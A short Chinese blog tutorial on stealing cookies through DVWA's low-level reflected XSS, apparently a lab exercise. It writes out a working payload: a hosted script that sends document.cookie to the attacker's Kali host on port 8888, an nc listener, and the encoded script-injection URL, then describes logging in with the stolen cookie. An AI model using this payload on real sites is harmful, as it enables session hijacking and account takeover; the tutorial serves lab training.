Cookie劫持之DVWA(XSS-low)

1、利用环境配置

首先在kali中开启apacha服务

sudo service apache2 start

然后在网站目录/var/www/html 下创建一个恶意js脚本

var image=new Image();
image.src="http://192.168.31.155:8888/cookies="+document.cookie;

构造完之后利用nc端口监听8888端口

sudo nc -lvp 8888

 

2、用户点击

当用户点击url:http://192.168.31.202/vulnerabilities/xss_r/?name=%3Cscript+src%3Dhttp%3A%2F%2F192.168.31.155%2Fcookie.js%3E%3C%2Fscript%3E

此时的XSSpayload:<script src=http://192.168.31.155/cookie.js></script>

然后抓包查看,

 

 

点击forword,接下来一个包就可以看到通过XSSpayload执行了我们放在kali中的恶意js代码,然后访问我们正在监听的端口

 

可以看到,用户的cookie信息已经成功的发送到8888端口中,可以直接通过bp抓包修改cookie值登录这个用户的账号

 

posted @ 2021-01-28 15:19  1jzz  阅读(240)  评论(0编辑  收藏  举报